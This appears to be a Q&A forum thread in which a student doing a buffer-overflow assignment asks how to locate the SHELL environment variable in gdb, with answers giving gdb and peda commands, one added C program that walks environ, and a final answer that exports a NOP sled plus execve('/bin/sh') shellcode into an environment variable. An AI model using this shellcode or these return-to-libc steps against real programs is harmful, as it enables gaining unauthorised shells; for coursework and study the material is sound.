
I have to exploit a very simple buffer overflow in a vulnerable C++ program for an assignment and I am not able to find the environment variable SHELL.

I have never worked with BoF before, and after reading lots of similar questions, posts, etc. I have this information (correct me if it's wrong):

  • The program stores the environment variables in a global variable called environ
  • I can find the address of this variable like this:

    (gdb) info variable environ
    All variables matching regular expression "environ":
    Non-debugging symbols:
    0xb7fd1b00  __environ
    0xb7fd1b00  _environ
    0xb7fd1b00  environ
  • I need to find the /bin/bash string in that variable to launch a shell (I have already got the system and exit addresses, I only need the route to the shell). And here is where I don't know what to do. I have been reading gdb tutorials, but still nothing. x/s 0xb7fd1b00 does not output anything useful.

    4 Answers


    environ is a pointer to a pointer, as it has the type char **environ.

    You have to try something like:

    (gdb) x/s *((char **)environ)
    0xbffff688:     "SSH_AGENT_PID=2107"
    (gdb) x/s *((char **)environ+1)
    0xbffff69b:     "SHELL=/bin/bash"
    • That's it!! Thanks a lot :) I had managed to get the address just with x/s environ and TONS of "enter"s, but it wasn't very nice :P
      – Palantir
      Commented Mar 28, 2012 at 21:29
    • A lot easier to remember: x/s *environ. If you need to see multiple variables... x/5s *environ
      – user52132
      Commented Jul 17, 2014 at 2:47
    • I get "Cannot access memory at address ...". Possible memory-read protection in RHEL 6 systems??
      – Otheus
      Commented Sep 5, 2015 at 21:40
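    As an added example (not part of the question or any answer), a small C program that walks environ the same way the gdb commands above do: it treats environ as a NULL-terminated array of char * and indexes into it, and it also shows that glibc's global environ is the same array as main's envp argument. The names env_index, env_entry and sample_env are my own, and sample_env is a constructed array, not a real process environment.

```c
#include <stdio.h>
#include <string.h>

extern char **environ;   /* glibc's global, the char **environ that gdb lists */

/* Return the index i such that environ[i] is "NAME=value" for NAME, or -1.
 * This is the arithmetic behind gdb's  x/s *((char **)environ+i). */
int env_index(char **envp, const char *name)
{
    size_t n = strlen(name);
    for (int i = 0; envp[i] != NULL; i++) {
        /* Match the name only up to '=' so "SH" does not match "SHELL=". */
        if (strncmp(envp[i], name, n) == 0 && envp[i][n] == '=')
            return i;
    }
    return -1;
}

/* Return a pointer to the "NAME=value" string itself (the address gdb
 * prints before the string), or NULL if NAME is not set. */
char *env_entry(char **envp, const char *name)
{
    int i = env_index(envp, name);
    return i < 0 ? NULL : envp[i];
}

/* Constructed sample mirroring the answer's gdb output (not a real environment). */
char *sample_env[] = { "SSH_AGENT_PID=2107", "SHELL=/bin/bash", NULL };

int main(int argc, char **argv, char **envp)
{
    (void)argc; (void)argv;
    /* At startup glibc sets environ to main's envp, so both views agree. */
    printf("environ = %p, envp = %p (%s)\n", (void *)environ, (void *)envp,
           environ == envp ? "same array" : "differ");

    /* Same walk as  x/5s *environ , but printing each pointer as well. */
    for (int i = 0; environ[i] != NULL; i++)
        printf("environ[%d] @ %p: %s\n", i, (void *)environ[i], environ[i]);

    char *shell = env_entry(environ, "SHELL");
    if (shell != NULL)
        printf("SHELL entry is environ[%d] @ %p: %s\n",
               env_index(environ, "SHELL"), (void *)shell, shell);
    return 0;
}
```

Run it under gdb after a breakpoint on main and the addresses it prints for environ[i] are the ones x/s *((char **)environ+i) shows.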
    • Environment variables are 16 bytes from the base pointer (%ebp).
    • Put a breakpoint in the main function and do this:

    (gdb) x/wx $ebp+0x10
    0xffffd3f8: 0xffffd48c
    (gdb) x/wx 0xffffd48c
    0xffffd48c: 0xffffd67e
    (gdb) x/s 0xffffd67e
    0xffffd67e: "XDG_SEAT_PATH=/org/freedesktop/DisplayManager/Seat0"
    (gdb) x/wx 0xffffd48c+4
    0xffffd490: 0xffffd6b2
    (gdb) x/s 0xffffd6b2
    0xffffd6b2: "XDG_CONFIG_DIRS=/etc/xdg/lubuntu:/etc/xdg/xdg-Lubuntu:/usr/share/upstart/xdg:/etc/xdg"

    Refer to this blog.


      If you have peda installed for gdb, then you could simply type this in gdb:

      gdb-peda$ searchmem SHELL 

      The output would show

      Searching for 'SHELL' in: None ranges
      Found 1 results, display max 1 items:
      [stack] : 0xbffff540 ("SHELL=/bin/bash")

        Also you can use just "refsearch variable_name" if you have peda installed for gdb.

        example:

        First of all, you should add a variable (something like Shellcode) to the environment.

        (export Shellcode=$(python -c 'print "\x90"*100 +"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe1\x50\x89\xe2\xb0\x0b\xcd\x80"')) 

        Then open gdb with the sample program, break on main and run.

        When the program pauses at the breakpoint, you can search for the environment address with the following command:

        refsearch Shellcode
